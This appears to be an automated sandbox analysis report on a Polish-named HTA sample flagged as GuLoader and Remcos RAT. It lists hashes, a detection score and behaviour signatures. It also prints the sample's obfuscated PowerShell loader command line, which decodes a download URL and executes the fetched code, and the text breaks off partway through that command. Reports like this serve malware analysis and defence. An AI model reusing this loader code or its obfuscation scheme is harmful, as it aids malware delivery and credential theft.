Windows Analysis Report
PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta
Overview
General Information

| Field | Value |
|---|---|
| Sample name | PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta (renamed because original name is a hash value) |
| Original sample name | PLOCMR-002 Dane dotyczce dokumentw i towarw.hta |
| Analysis ID | 1435041 |
| MD5 | 86816f2832da46166cc3079c4c32a2d6 |
| SHA1 | a92657644d8dff7c7801eb465ca91e22767998b3 |
| SHA256 | 655f862dff56546606f574d6ca39a4f7dc0d3f5fc22d3f2e3cd3562e7c78a63e |
Detection

GuLoader, Remcos

| Field | Value |
|---|---|
| Score | 100 |
| Range | 0 - 100 |
| Whitelisted | false |
| Confidence | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 3716 cmdline: mshta.exe "C:\Users\user\Desktop\PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
  - powershell.exe (PID: 3748 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Kostplan en = 1;$Fa rvervej='S ubstrin';$ Farvervej+ ='g';Funct ion Bortle dede($Heks ekedlen220 ){$Electro static=$He ksekedlen2 20.Length- $Kostplane n;For($Lse hovederne= 4; $Lsehov ederne -lt $Electros tatic; $Ls ehovederne +=(5)){$Te aseled+=$H eksekedlen 220.$Farve rvej.Invok e($Lsehove derne, $Ko stplanen); }$Teaseled ;}function Oraklerne ($Forpagtn igsafgifte ns110){. ( $Attackman ) ($Forpag tnigsafgif tens110);} $Rheophore =Bortleded e 'BullM E ftoTur,zSi kkiQ.aflB ssl Prea R ew/Udlb5Te tr.Bill0Ov er quic( R o,WIodiiF rgn G.sdLa ndo AfgwCy kes.agt Br acN Fl,TBr ok Pic,1Je tm0Lagr.Me gi0Sho.; A pp AntiWLa iciSygenHy mn6F,rr4 U nf;.rov al vaxAzox6Wa pa4 Del;Pa ca Pro.r H ydvOutl:U. de1Pea.2 S ca1.ntr.E. mo0slap)N. nc WindG A bleCompc U ntkHor,o , ei/slre2.r ol0 Fir1 U ,a0Pann0Ba g.1Sten0fo rt1 arm Re ,F katiA a crUnreeprp fCo,soNap hx Cl / An ,1Bero2Ind s1trlb.Mu k0An.i ';$ prologfort olkere=Bor tledede 'O phrU jrsMa age GonrSk b-MassAPe ntgUn,se R etnHa rt,n ar ';$Renp risen=Bort ledede 'Ar thhKurdtCy ,itRamppGa be:Hedt/ . ig/ anv8Fl yt7 Hom.Ex tr1 ype2Pr ee1Fris.Bo l 1Lovp0Po st5Cott.Sa mm1P,th6 M a 3 Dis/ d nSBefouFli nbTeoduA h emSandb,ea piSheelFor gi,ishcPyn taNar lPar . MardSku fw Lemp Po s ';$Burge ssdom=Bort ledede 'W, ip>Til ';$ Attackman= Bortledede 'Reisi,on ce,agaxR.g i ';$Robaa des='Skjol ddragerens ';Oraklern e (Bortled ede 'D.siS .pveTec.t Coll-ElecC UnioBevin M.katL jle P,rnH.sht ,rem Van,- RecuPTa ta OvertMassh ,el Ro.dT Siou: Bru\ TschtDesce ProglPrefe E.ptfBarbo SemirH,alb odiRenonS ,rid erre rovlFremsO mkoe UdbnD gndsSagv.f rstSpirxR esutLett I os-nonsV V,sa LoelS isbuFriteG ain Exo$Un dlRLithoDe dibStttaLo coaSol,dRe see FowsCo nv;sogg ') ;Oraklerne (Bortlede de 'PlagiF or,f For D .to( OpvtT aste ChrsG rnstMid.- Forp EftaF as,t,tophA rtu KoitTS t g:Ande\ CystS,are atalAflae. 
dmof,efioL novrpantbe x,si Vi.nL sepdSka eM alul Heas vege FornP aras,ore.M .set CarxH iertAncr) P,e{FogeeT ranxRaadik erntKirk}S yn,;Kase ' );$Baetyli c = Bortle dede 'Kult e,ondcE,sa hA atoTouc Nono% Ste a VilpI te pGly d Tro aT drtLi.g a Cen%gara \ ,igI Fos dHyp.e Das aEighlMand oSvrtgGesj iStu.cCass aAr,plPeal 1B ef4Rive 3Si.n.Pab. cBaudhKla. oForr Ter& D,n&A.gl konveVrdic BabbhCompo Neoc S ta$ Sem ';Ora klerne (Bo rtledede ' .ype$Infeg B,atlFl,ko .ucubFrita Ex.alGlo,: s moF ap,r CataoThyrg R kmVugge Ach,nVars= Vare( Frec matemPistd and Spir/ Ant.cDigi Pach$ F,rB ProtaShine Cy t Depy Ca,rlSelvi FagcSucc) Mora ');Or aklerne (B ortledede 'Pres$Lykn gBedalTape oNakebTelp aSvvnlRaci :MorbDSmot iT pmsCplf pW seoUro. n Tope Ska nStyrtFlyv etrskn Anc h .reeForm dpappeUple